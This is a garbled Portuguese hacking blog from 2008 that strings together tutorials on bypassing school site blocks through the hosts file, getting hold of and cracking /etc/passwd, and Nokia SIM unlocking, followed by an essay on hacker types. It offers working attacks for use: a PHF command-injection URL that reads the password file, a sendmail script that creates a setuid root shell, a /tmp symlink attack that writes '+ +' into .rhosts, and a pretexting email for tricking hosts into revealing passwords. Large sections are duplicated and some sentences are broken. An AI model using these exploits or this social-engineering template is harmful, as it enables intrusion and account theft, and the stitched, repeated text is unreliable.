Desbloqueiar site sem programas Galera é Muito facil
Nas escolas eles bloqueiam desse jeito q e to fazendo
1º - Abri o disco C, vai na pasta WINDOWS
2º - Dentro da pasta Windows abri a pasta system32.
3º - Abri a pasta Drivers dentro da pasta System32
4º - abri a pasta etc (etc é nome da pasta) e abri a pasta hosts e coloca bloco de notas
5º No final do bloco de notas vai tar 127.0.0.1 na frente o nome do site blokeiado ai vc deleta esse treco e salva abri a internet e o site ta desbloqueiado
quarta-feira, 13 de agosto de 2008
quinta-feira, 5 de junho de 2008
Invasão de Sities ( Não Me Responsabiliso Por Nada )
|
Invadindo Hp's |
Precauções que vc deverá
tomar quando hackear uma HP
Em primeiro lugar eu gostaria de avisar que hackear uma Home Page é crime, e dá cadeia.Se vc não hackear uma HP corretamente, seu IP ficará gravado em algum lugar e isso fará com que eles saibam
quem foi.Antes de fazer isso vc deverá estar preparado assim usando programas para
hackear.
A senha esta em um arquivo chamado password.
Esse arquivo está normalmente em um diretório chamado etc/passwd. Então vamos falar um pouco sobre o passwd.
Quando você pega o arquivo passwd, a senha pode vir encryptada ou então com shadow! A diferença é que a senha encryptada é a própria senha só que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório. Para obter a senha escrita você vai ter que desencripta-la! As senhas com shadow são impossíveis de "desencryptar"! (levando em conta que você não tem unix).
Uma senha encryptada é mais ou menos assim :
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh
Agora o exemplo de uma senha com shadow
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/
usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW
Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/
pin4geo:/bin/falseftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Você pode notar que tem um "x" no root! Esse
x pode ser representado também por um "*". Agora você já sabe um pouco mais
sobre o arquivo passwd e sobre as senhas.
Desencriptando
Para desencryptar uma senha precisaremos de
três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack
14)e logicamente o arquivo onde está senha (passwd). O que é cada um? Word list-
Como o próprio nome já diz, é uma lista de palavras. Desencryptador- É o
programa que você vai usar para desencryptar a senha. Passwd- Nesse arquivo está
a senha encryptada.
Coloque todos esses itens nesse mesmo
diretório. Abra o prompt do DOS e entre no diretório onde eles estão. Agora faça
o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde
esta a senha" "nome da sua word list" Então vamos supor que meu programa é o
jack, o arquivo é o passwd, a word list é lista. Então ficaria assim : jack
passwd lista.txt
E pronto! A senha está desencryptada! Mas
como isso funciona??
Quando você roda o jack ele pega o arquivo passwd e testa com todas as palavras
da word list.
Invasão por PHF
O phf é com certeza o modo mais simples de
se obter o arquivo passwd. É tão simples que você não precisa saber nada! A
única coisa que você tem que fazer é abrir seu browser e colocar uma URL. Porém
esse método tem 95% de chance de não funcionar! A maioria dos servidores já
acharam o bug e concertaram. Só colocar essa URL no local do seu browser :
http://Endereçodapage/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
Apenas isso e pronto!
Hackeando Home Pages de Servidores Grátis
Alguns servidores de home page tipo a
geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home
pages no ar. Há um modo bem simples de se obter ]a senha de home pages que estão
nesses servidores. Tudo que voce tem que fazer é mandar um e-mail pedindo pra
eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo :
"por favor me mandem a senha". Façam algo mais convincente. Pegue todas as
informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço
de vocês e recebi uma senha e um user name e meu endereço "endereço da HP do
cara". Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei
das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é :
"user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."
Companhias como a geocities são muito
ocupadas pra ficar verificando se é verdade eu não! Provavelmente eles iram
acreditar e em 2 semanas (mais ou menos) você receberá a senha no seu e-mail!
Telnet e Exploits
Exploits é talvez o melhor método de hackear uma home page. Mas ele é um pouco mais complicado do que os outros métodos como phf e ftp. Antes de tudo você vai precisar de um programa de telnet. Exploits
expo em erros e bugs nos sistemas e normalmente te dão root, sysop, admin....
Vou listar alguns exploits abaixo :
Esse se chama sendmail bug.
Ele cria um programa /tmp/x que chama
shells como root.
cat << _EOF_>/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_>/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_>/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed
s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd
/tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
agora é um outro método.
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep
pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05
.302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep
pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts
/tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep
pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
Desbloquiando Celulares da Nokia!!
Este tópico tem a finalidade de familiarizar a todos com o desbloqueio dos
aparelhos Nokia.
Suas databases estão expostas na Internet, diferente de muitos outros aparelhos,
como por exemplo os Motorola e os SonyEricsson. O que possibilita o desbloqueio
através de códigos e também a criação de calculadoras para a mesma finalidade.
Demonstraremos o procedimento utilizando a calculadoras mais recente para esses
aparelhos, desenvolvida pelo Crux. ( CruxUnlocker - disponível para download em
NOKIA SOFTWARES)
Considerações:
*Para se obter o IMEI do seu aparelho deve digitar *#06# no seu aparelho a
qualquer momento. No caso dos Nokia ele é exibido como Número de Série.
*Pressionando a tecla * gera os algarismos P, W e + para colocação do código no
aparelho.
*Tanto faz colocar o código com ou sem o SIMCARD dentro do aparelho, no final o
resultado será o mesmo.
*Cada aparelho Nokia possui uma gama de 5 tentativas de desbloqueio via código.
Após essas tentativas, somente através de metodos utilizando hardware (cabo de
dados, boxes, clips,...).
*Novos aparelhos recentemente adquiridos na Tim não são passiveis de desbloqueio
via código, portanto se após a colocação do código exibir a mensagem SIM NOT
RESTRICT e o aparelho continuar bloqueado, somente será possível fazer o
destravamento do aparelho via hardware ( DCT 3 - Cabo Mbus/Fbus + software / DCT
4 - somente via Box (Twister, Nbox) ou Clip DCT4)
Desbloqueio DCT 3.
Esses aparelhos tem o desbloqueio bem simplificado, basta seguir os destaques na
foto abaixo e os comentários que seguem.
*Pegamos aleatoriamente um IMEI para demonstrar o funcionamento.
1- DCT 3 / Aparelho = Nessa janela deveremos marcar a opção DCT 3 e o aparelho
que possui, no caso pegamos como exemplo o 3310.
2 - IMEI = Deveremos colocar o IMEI gerado pelo aparelho, ao digtar *#06#.
3 - Country = No nosso caso Brasil.
4 - Provider = Nessa parte iremos selecionar a operadora em questão. ( Oi, Tim,
Claro, BrT, ...).
5 - Após clicar em CALCULATE será gerado um código, no caso o código gerado foi
#pw+4768421191+1#. Não administrar ESPAÇOS na hora de colocar o código no
celular, até porque não é possível. A calculadora somente separa o código gerado
para facilitar a leitura.
IGNORE AS JANELAS GID 1, GID 2 e MSNI.
Ao final, se tudo correr bem o aparelho estará desbloqueado!
Desbloqueio DCT 4
Preste bastante atenção: Os aparelhos DCT 4 são bem mais complicados, mas não
chega a ser um bicho de 7 cabeças. Basta seguir todo o procedimento que será
descrito, que a chance de se sair bem sucedido é de 100%.
1-DCT 4 / Aparelho = Nessa janela deveremos marcar a opção DCT 3 e o aparelho
que possui, no caso pegamos como exemplo o 3100. Não se preocupe com variações
do tipo 3100 e 3100b, o código gerado será o mesmo em todos os casos desse tipo
de variação.
2-IMEI = Deveremos colocar o IMEI gerado pelo aparelho, ao digtar *#06#.
3-Country = No nosso caso Brasil.
4-Provider = Nessa parte iremos selecionar a operadora em questão. ( Oi, Tim,
Claro, BrT, ...).
5-Box e Asic - A algum tempo atrás essa era a grande dor de cabeça em
desbloquear um Nokia DCT4, pois existia variações que não era conhecidas por
todos. Hoje sabemos que a grande maioria dos DCT 4 são Asic 2 - V2. Logicamente
as variações ainda existem, mas a CruxUnlocker nos da a vantagem de nem sequer
tocar nesse ponto da calculadora, ela já faz o trabalho por si só. Pegue por
exemplo o 6230, esse aparelho só foi solucionado graças a um cara chamado Myke
que disponibilizou os source codes para a confecção dessa ótima ferramenta.
Trate-se de um Asic 6. Ao mudar na calculadora o aparelho para o 6230 verá que a
mesma automaticamente mudará para Asic 6 - Asic 6. Portanto fique tranqüilos com
essa parte, basta selecionar o aparelho e ela da conta do resto.
6 - Finalmente colocando o código no aparelho - Observe acima que diferente dos
DCT 3, que gera apenas 1 código, os DCT 4 geram 7 códigos. Eu destaquei os dois
que realmente vão importar na hora de colocar o código no aparelho. o primeiro
código destacado na tonalidade roxa, é o código padrão, apenas com ele na
maioria das vezes o aparelho é imediatamente desbloqueado, não fazendo
necessário a utilização do código destacado em ciano, que chamamos de Master
Code. Como somente possui 5 tentaivas, utilize o código #pw+***************+1#,
caso não resolva vá até o código #pw+***************+7#. caso não funcione
reveja todos os passos acima e tente novamente.
Abraços a todos
__________________________________________________________
Tutorial: Inserindo códigos de desbloqueio nos celulares Nokia.
Primeiramente, é importante saber que cada código é gerado a partir do Imei do
aparelho e do código da operadora a qual ele está bloqueado. Portanto serve
apenas para ser usado naquele aparelho especificamente.
O Imei do aparelho é o código de série dele que o identifica nas redes GSM a
qual ele estiver sendo usado. Para saber o Imei do seu aparelho, digite *#06#
Inserindo os códigos:
Para inserir o código, desligue seu aparelho e retire o chip, então ligue-o sem
o chip e como todo aparelho GSM, vai aparecer uma tela pedindo para inserir o
chip “insert sim card” ou “insira cartão sim”. É nessa tela que o código deverá
ser digitado. Basta apertar qualquer tecla que já vai aparecendo na tela o que
está sendo digitado.
O código é composto por #pw+xxxxxx+x# onde os xxxx compõem uma seqüência de
alguns números. Para digitar os caracteres p, w e +, eles aparecem apertando
repetidamente a tecla *
Após ter digitado o código corretamente, poderão aparecer alguns tipos de
mensagens. Se seu celular foi desbloqueado, aparecerá algo do gênero: “sim no
restricted” ou “code accepted” ou “código aceito” ou “restrição removida”.
Se o código que você digitou estava errado, deve aparecer algo do tipo “code
error”. Sendo assim, reveja se o Imei do seu aparelho foi informado corretamente
e se é realmente aquela operadora que ele apenas funciona com ela.
Muita atenção, pois seu aparelho permite apenas 5 tentativas de inserção de
códigos para desbloqueio, após isso, ele não poderá ser mais desbloqueado por
códigos e somente por Box. Se ele já estiver com as tentativas esgotadas, ao
inserir mais um código, aparecerá uma mensagem do tipo: “Cannot undo restriction”
ou “impossível desfazer restrição”.
Quando você estiver digitando o código, e demorar para digitar o seguinte
numero, o celular automaticamente apaga o que você já digitou e volta para tela
inicial mostrando “Insert sim card”. Isso não conta como uma tentativa de
desbloqueio. Volte a digitar os códigos novamente com atenção.
É recomendado que seja tentado o desbloqueio apenas com o 1º e o 7º código, os
terminados com +1# e +7#, pois se esses não desbloquearem certamente há algum
erro na forma como o código foi gerado e tentar mais vezes não haverá êxito e
sim o desperdício das tentativas.
aparelhos Nokia.
Suas databases estão expostas na Internet, diferente de muitos outros aparelhos,
como por exemplo os Motorola e os SonyEricsson. O que possibilita o desbloqueio
através de códigos e também a criação de calculadoras para a mesma finalidade.
Demonstraremos o procedimento utilizando a calculadoras mais recente para esses
aparelhos, desenvolvida pelo Crux. ( CruxUnlocker - disponível para download em
NOKIA SOFTWARES)
Considerações:
*Para se obter o IMEI do seu aparelho deve digitar *#06# no seu aparelho a
qualquer momento. No caso dos Nokia ele é exibido como Número de Série.
*Pressionando a tecla * gera os algarismos P, W e + para colocação do código no
aparelho.
*Tanto faz colocar o código com ou sem o SIMCARD dentro do aparelho, no final o
resultado será o mesmo.
*Cada aparelho Nokia possui uma gama de 5 tentativas de desbloqueio via código.
Após essas tentativas, somente através de metodos utilizando hardware (cabo de
dados, boxes, clips,...).
*Novos aparelhos recentemente adquiridos na Tim não são passiveis de desbloqueio
via código, portanto se após a colocação do código exibir a mensagem SIM NOT
RESTRICT e o aparelho continuar bloqueado, somente será possível fazer o
destravamento do aparelho via hardware ( DCT 3 - Cabo Mbus/Fbus + software / DCT
4 - somente via Box (Twister, Nbox) ou Clip DCT4)
Desbloqueio DCT 3.
Esses aparelhos tem o desbloqueio bem simplificado, basta seguir os destaques na
foto abaixo e os comentários que seguem.
*Pegamos aleatoriamente um IMEI para demonstrar o funcionamento.
1- DCT 3 / Aparelho = Nessa janela deveremos marcar a opção DCT 3 e o aparelho
que possui, no caso pegamos como exemplo o 3310.
2 - IMEI = Deveremos colocar o IMEI gerado pelo aparelho, ao digtar *#06#.
3 - Country = No nosso caso Brasil.
4 - Provider = Nessa parte iremos selecionar a operadora em questão. ( Oi, Tim,
Claro, BrT, ...).
5 - Após clicar em CALCULATE será gerado um código, no caso o código gerado foi
#pw+4768421191+1#. Não administrar ESPAÇOS na hora de colocar o código no
celular, até porque não é possível. A calculadora somente separa o código gerado
para facilitar a leitura.
IGNORE AS JANELAS GID 1, GID 2 e MSNI.
Ao final, se tudo correr bem o aparelho estará desbloqueado!
Desbloqueio DCT 4
Preste bastante atenção: Os aparelhos DCT 4 são bem mais complicados, mas não
chega a ser um bicho de 7 cabeças. Basta seguir todo o procedimento que será
descrito, que a chance de se sair bem sucedido é de 100%.
1-DCT 4 / Aparelho = Nessa janela deveremos marcar a opção DCT 3 e o aparelho
que possui, no caso pegamos como exemplo o 3100. Não se preocupe com variações
do tipo 3100 e 3100b, o código gerado será o mesmo em todos os casos desse tipo
de variação.
2-IMEI = Deveremos colocar o IMEI gerado pelo aparelho, ao digtar *#06#.
3-Country = No nosso caso Brasil.
4-Provider = Nessa parte iremos selecionar a operadora em questão. ( Oi, Tim,
Claro, BrT, ...).
5-Box e Asic - A algum tempo atrás essa era a grande dor de cabeça em
desbloquear um Nokia DCT4, pois existia variações que não era conhecidas por
todos. Hoje sabemos que a grande maioria dos DCT 4 são Asic 2 - V2. Logicamente
as variações ainda existem, mas a CruxUnlocker nos da a vantagem de nem sequer
tocar nesse ponto da calculadora, ela já faz o trabalho por si só. Pegue por
exemplo o 6230, esse aparelho só foi solucionado graças a um cara chamado Myke
que disponibilizou os source codes para a confecção dessa ótima ferramenta.
Trate-se de um Asic 6. Ao mudar na calculadora o aparelho para o 6230 verá que a
mesma automaticamente mudará para Asic 6 - Asic 6. Portanto fique tranqüilos com
essa parte, basta selecionar o aparelho e ela da conta do resto.
6 - Finalmente colocando o código no aparelho - Observe acima que diferente dos
DCT 3, que gera apenas 1 código, os DCT 4 geram 7 códigos. Eu destaquei os dois
que realmente vão importar na hora de colocar o código no aparelho. o primeiro
código destacado na tonalidade roxa, é o código padrão, apenas com ele na
maioria das vezes o aparelho é imediatamente desbloqueado, não fazendo
necessário a utilização do código destacado em ciano, que chamamos de Master
Code. Como somente possui 5 tentaivas, utilize o código #pw+***************+1#,
caso não resolva vá até o código #pw+***************+7#. caso não funcione
reveja todos os passos acima e tente novamente.
Abraços a todos
__________________________________________________________
Tutorial: Inserindo códigos de desbloqueio nos celulares Nokia.
Primeiramente, é importante saber que cada código é gerado a partir do Imei do
aparelho e do código da operadora a qual ele está bloqueado. Portanto serve
apenas para ser usado naquele aparelho especificamente.
O Imei do aparelho é o código de série dele que o identifica nas redes GSM a
qual ele estiver sendo usado. Para saber o Imei do seu aparelho, digite *#06#
Inserindo os códigos:
Para inserir o código, desligue seu aparelho e retire o chip, então ligue-o sem
o chip e como todo aparelho GSM, vai aparecer uma tela pedindo para inserir o
chip “insert sim card” ou “insira cartão sim”. É nessa tela que o código deverá
ser digitado. Basta apertar qualquer tecla que já vai aparecendo na tela o que
está sendo digitado.
O código é composto por #pw+xxxxxx+x# onde os xxxx compõem uma seqüência de
alguns números. Para digitar os caracteres p, w e +, eles aparecem apertando
repetidamente a tecla *
Após ter digitado o código corretamente, poderão aparecer alguns tipos de
mensagens. Se seu celular foi desbloqueado, aparecerá algo do gênero: “sim no
restricted” ou “code accepted” ou “código aceito” ou “restrição removida”.
Se o código que você digitou estava errado, deve aparecer algo do tipo “code
error”. Sendo assim, reveja se o Imei do seu aparelho foi informado corretamente
e se é realmente aquela operadora que ele apenas funciona com ela.
Muita atenção, pois seu aparelho permite apenas 5 tentativas de inserção de
códigos para desbloqueio, após isso, ele não poderá ser mais desbloqueado por
códigos e somente por Box. Se ele já estiver com as tentativas esgotadas, ao
inserir mais um código, aparecerá uma mensagem do tipo: “Cannot undo restriction”
ou “impossível desfazer restrição”.
Quando você estiver digitando o código, e demorar para digitar o seguinte
numero, o celular automaticamente apaga o que você já digitou e volta para tela
inicial mostrando “Insert sim card”. Isso não conta como uma tentativa de
desbloqueio. Volte a digitar os códigos novamente com atenção.
É recomendado que seja tentado o desbloqueio apenas com o 1º e o 7º código, os
terminados com +1# e +7#, pois se esses não desbloquearem certamente há algum
erro na forma como o código foi gerado e tentar mais vezes não haverá êxito e
sim o desperdício das tentativas.
Hackers
Este artigo tem como objetivo a introdução do leitor a um aspecto do mundo (ou
submundo) virtual, a "Internet", que são os comentados "hackers" e "crackers" .
Através de explicações simples serão apresentadas as informações básicas sobre
este fascinante e empolgante assunto. Introdução: Várias são as fantasias e a
imaginação das pessoas sobre esta figura assustadora que navega no mundo
virtual. Então, vamos começar definindo primeiramente o que são estas figuras.
É aquele que tem conhecimentos profundos de sistemas operacionais e linguagens
de programação, principalmente "Unix" e "C" respectivamente. Conhece as falhas
de segurança dos sistemas e está sempre a procura de novas.
O mesmo que "hacker", com a diferença de utilizar seu conhecimento para o "mal". Destruir e roubar são suas palavras de ordem. Especializado em telefonia, atua na obtenção de ligações telefônicas gratuitas,
instalação de escutas, facilitando o ataque a sistemas a partir de acesso no
exterior, tornando-se invisíveis ao rastreamento ou colocando a responsabilidade
em terceiros. Devido ao grande número de pessoas que hoje se dizem "hackers",
novas definições poderão ser encontradas.
É quem está tentando ser "hacker", sai perguntando para todo mundo o que fazer para tornar-se um.
O pior de todos, são os "hackers de araque". Pensam que sabem tudo e acabam
acessando revistas virtuais pornográficas nas madrugadas. A Formação de um "hacker":
Estes seres pensantes possuem diversas formas de atuação, mas sua formação é
fundamental. Os verdadeiros "hackers" desenvolvem os seus próprios programas,
para tanto, são estudiosos profundos dos principais "softwares" utilizados na
"Internet". Conhecem um dos principais, senão o principal sistema operacional do
meio, o "Unix", "debulham" seus códigos fontes, por se tratar de sistema "freesource"
(código fonte aberto), alteram estes códigos, criando seus próprios utilitários.
Programam em "linguagem C", uma linguagem poderosa de programação. Mas não
satisfeitos continuam estudando, obtendo fontes de outros bons programas,
alterando-os, e novamente estudando, alterando, ... Algumas Formas de Atuação:
A Rota da Transgressão:
Violação de orelhões:
Para não ser descoberto, o "hacker" estaciona o carro perto de orelhões, onde se
conecta com um computador portátil para iniciar seu "trabalho". Ponte
Eletrônica: Computadores de instituições ou universidades menos protegidas, que
o "hacker" já tenha invadido, podem servir de ponte para suas novas tentativas
de invasão. "Cavalo de Tróia": Semelhante ao famoso presente dos troianos, onde dentro do
belo cavalo de madeira, estavam escondidos centenas de soldados prontos para
atacar a cidade presenteada, programas úteis ou inúteis, ou simples jogos,
possuem dentro deles, códigos capazes de não só executar a função proposta, como
também, destruir, armazenar, ou copiar informações do sistema. Temos como
exemplo, programas que imitam "login" de um provedor e armazenam esta informação
em locais onde posteriormente o "curioso" poderá recupera-la facilmente.
São passagens secretas, ou "porta dos fundos", isto é, senha secreta criada pelo autor do "software", não documentada, é claro, que independente do administrador do sistema pode ser usada para acessar ilimitadamente todos os recursos
disponíveis. "Farejamento de Redes": Utilizando-se do empacotamento das
mensagens nas redes de computadores, programas especialistas procuram neles
palavras como "password" e "senha". Quando encontradas, o programa copia o pacote e o envia para o computador do "hacker", que então se utiliza de técnicas próprias para tentar decodifica-las, pois as senhas estão todas "criptografadas".
Observando-se usuários de computadores digitarem suas senhas, procurando saber
datas de nascimento e nome de seus filhos, por exemplo, chega-se várias vezes a
descobrir suas senhas, pois em geral, as pessoas utilizam senhas que lembram
algo de sua vida particular. "Quebra Cabeça": Através de programas capazes de
montar combinações de letras e números, os "hackers" tentam acessar os seus
alvos. Esta técnica é muito demorada, pois as tentativas deverão ser efetuadas
por um período curto e com grandes intervalos de tempo, para não despertar
suspeita. Muitos usuário utilizam senhas iguais ao do nome do "login" , ou seu próprio nome para "login" e sobrenome para "password". Pior ainda, alguns administradores utilizam as senhas padrões em seus sistemas, facilitando
bastante a atuação dos "hackers". "Invasão do Servidor": Através de "ftp"
anônimo, pode-se baixar o arquivo que contem as "passwords" dos usuários e,
através de técnicas de tentativa de "descriptografias", obter "passwords" deste
provedor. Alguns Utilitários Conhecidos: Diversos são os utilitários disponíveis na citarei alguns: Brincadeiras de mal gosto: Atinge principalmente usuários da "Internet" que se utilizam de provedores de acesso. São enviados, através de programas apropriados, repetidas vezes, até centenas, a mesma mensagem, que "estouram" a área limitada na caixa postal para receber mensagens, passando o provedor a rejeitar novas mensagens para o usuário, as vezes importantes para o negócio de uma empresa. Programas de normalmente preenchem o campo "from:", mas existem programas, como por exemplo, o "Anonymail", que deixam o usuário preencher os campos de e em que servidor de "e-mail" deseja enviar a mensagem, podendo o usuário se passar por quem quer que seja.
Programa criado por que os usuários que se utilizam do Windows 95em seus acessos a "Internet". É necessário para sua execução saber
qual o IP da vítima.
submundo) virtual, a "Internet", que são os comentados "hackers" e "crackers" .
Através de explicações simples serão apresentadas as informações básicas sobre
este fascinante e empolgante assunto. Introdução: Várias são as fantasias e a
imaginação das pessoas sobre esta figura assustadora que navega no mundo
virtual. Então, vamos começar definindo primeiramente o que são estas figuras.
É aquele que tem conhecimentos profundos de sistemas operacionais e linguagens
de programação, principalmente "Unix" e "C" respectivamente. Conhece as falhas
de segurança dos sistemas e está sempre a procura de novas.
O mesmo que "hacker", com a diferença de utilizar seu conhecimento para o "mal". Destruir e roubar são suas palavras de ordem. Especializado em telefonia, atua na obtenção de ligações telefônicas gratuitas,
instalação de escutas, facilitando o ataque a sistemas a partir de acesso no
exterior, tornando-se invisíveis ao rastreamento ou colocando a responsabilidade
em terceiros. Devido ao grande número de pessoas que hoje se dizem "hackers",
novas definições poderão ser encontradas.
É quem está tentando ser "hacker", sai perguntando para todo mundo o que fazer para tornar-se um.
O pior de todos, são os "hackers de araque". Pensam que sabem tudo e acabam
acessando revistas virtuais pornográficas nas madrugadas. A Formação de um "hacker":
Estes seres pensantes possuem diversas formas de atuação, mas sua formação é
fundamental. Os verdadeiros "hackers" desenvolvem os seus próprios programas,
para tanto, são estudiosos profundos dos principais "softwares" utilizados na
"Internet". Conhecem um dos principais, senão o principal sistema operacional do
meio, o "Unix", "debulham" seus códigos fontes, por se tratar de sistema "freesource"
(código fonte aberto), alteram estes códigos, criando seus próprios utilitários.
Programam em "linguagem C", uma linguagem poderosa de programação. Mas não
satisfeitos continuam estudando, obtendo fontes de outros bons programas,
alterando-os, e novamente estudando, alterando, ... Algumas Formas de Atuação:
A Rota da Transgressão:
Violação de orelhões:
Para não ser descoberto, o "hacker" estaciona o carro perto de orelhões, onde se
conecta com um computador portátil para iniciar seu "trabalho". Ponte
Eletrônica: Computadores de instituições ou universidades menos protegidas, que
o "hacker" já tenha invadido, podem servir de ponte para suas novas tentativas
de invasão. "Cavalo de Tróia": Semelhante ao famoso presente dos troianos, onde dentro do
belo cavalo de madeira, estavam escondidos centenas de soldados prontos para
atacar a cidade presenteada, programas úteis ou inúteis, ou simples jogos,
possuem dentro deles, códigos capazes de não só executar a função proposta, como
também, destruir, armazenar, ou copiar informações do sistema. Temos como
exemplo, programas que imitam "login" de um provedor e armazenam esta informação
em locais onde posteriormente o "curioso" poderá recupera-la facilmente.
São passagens secretas, ou "porta dos fundos", isto é, senha secreta criada pelo autor do "software", não documentada, é claro, que independente do administrador do sistema pode ser usada para acessar ilimitadamente todos os recursos
disponíveis. "Farejamento de Redes": Utilizando-se do empacotamento das
mensagens nas redes de computadores, programas especialistas procuram neles
palavras como "password" e "senha". Quando encontradas, o programa copia o pacote e o envia para o computador do "hacker", que então se utiliza de técnicas próprias para tentar decodifica-las, pois as senhas estão todas "criptografadas".
Observando-se usuários de computadores digitarem suas senhas, procurando saber
datas de nascimento e nome de seus filhos, por exemplo, chega-se várias vezes a
descobrir suas senhas, pois em geral, as pessoas utilizam senhas que lembram
algo de sua vida particular. "Quebra Cabeça": Através de programas capazes de
montar combinações de letras e números, os "hackers" tentam acessar os seus
alvos. Esta técnica é muito demorada, pois as tentativas deverão ser efetuadas
por um período curto e com grandes intervalos de tempo, para não despertar
suspeita. Muitos usuário utilizam senhas iguais ao do nome do "login" , ou seu próprio nome para "login" e sobrenome para "password". Pior ainda, alguns administradores utilizam as senhas padrões em seus sistemas, facilitando
bastante a atuação dos "hackers". "Invasão do Servidor": Através de "ftp"
anônimo, pode-se baixar o arquivo que contem as "passwords" dos usuários e,
através de técnicas de tentativa de "descriptografias", obter "passwords" deste
provedor. Alguns Utilitários Conhecidos: Diversos são os utilitários disponíveis na citarei alguns: Brincadeiras de mal gosto: Atinge principalmente usuários da "Internet" que se utilizam de provedores de acesso. São enviados, através de programas apropriados, repetidas vezes, até centenas, a mesma mensagem, que "estouram" a área limitada na caixa postal para receber mensagens, passando o provedor a rejeitar novas mensagens para o usuário, as vezes importantes para o negócio de uma empresa. Programas de normalmente preenchem o campo "from:", mas existem programas, como por exemplo, o "Anonymail", que deixam o usuário preencher os campos de e em que servidor de "e-mail" deseja enviar a mensagem, podendo o usuário se passar por quem quer que seja.
Programa criado por que os usuários que se utilizam do Windows 95em seus acessos a "Internet". É necessário para sua execução saber
qual o IP da vítima.
Roubo na "Internet":
"Credit Card":
Programas geradores de números de cartões de crédito válidos que podem ser
usados para acessar "sites" pagos. Não são usados com a própria senha, ou da
casa do infrator, devendo ser efetuada a desconecção em alguns minutos, evitando
assim o rastreamento, principalmente de "sites" americanos.
"Cracker":
Decodificadores de "password", "número de série" ou "certificado de registro",
para "softwares", geralmente "sharewares", e com isto, torna-los "registrados" e
com todos os seus recursos habilitados. Páginas WWW: Vários "crackers" criam
páginas na "Internet" que são simplesmente verdadeiros bancos de dados com
informações de números seriais e senhas de acesso aos mais variados tipos de
"softwares" e "sites" de acesso limitado ("sites" pagos), principalmente "sites"
sobre sexo.
Resumo:
Hackers são viciados em Internet que usam seus conhecimentos para roubar senhas,
destruir conexões e algumas outras coisas, mas o conceito de hacker mudou muito
ao longo dos anos.Primeiramente, o hacker era aquele que "hackiava" a partir do
File Transfer Protocol, invadindo pequenas empresas ou provedores, roubando
senhas de conexão e outras coisas do tipo. Hoje hacker significa muito mais,
pode ser a pessoa que te desconecta da rede, que te manda um e-mail bomba ou
sabe um pouco de HTML e Javascript e gosta de se gabar com isso. Além disso,
existem também os vírus, normalmente pequenos programas que se instalam no
computador infectado e começam a destruí-lo a partir de um determinado dia. Hoje
os hackers não são mais tratados como vilões na rede, muitas vezes até como
heróis. Existem muita pessoas que dizem serem hackers mas que na verdade não
sabem nada. Uma passada numa página hacker e alguns programas nuke não tornam
ninguém um hacker, lembre-se disso. Para proteger-se contra os hackers, use uma
ferramenta de busca qualquer e digite palavras como anti-nuke, proteções,
detectors, etc
Técnicas Adotadas Por ' Crackers De Sistema' Quando Tentando Invadir
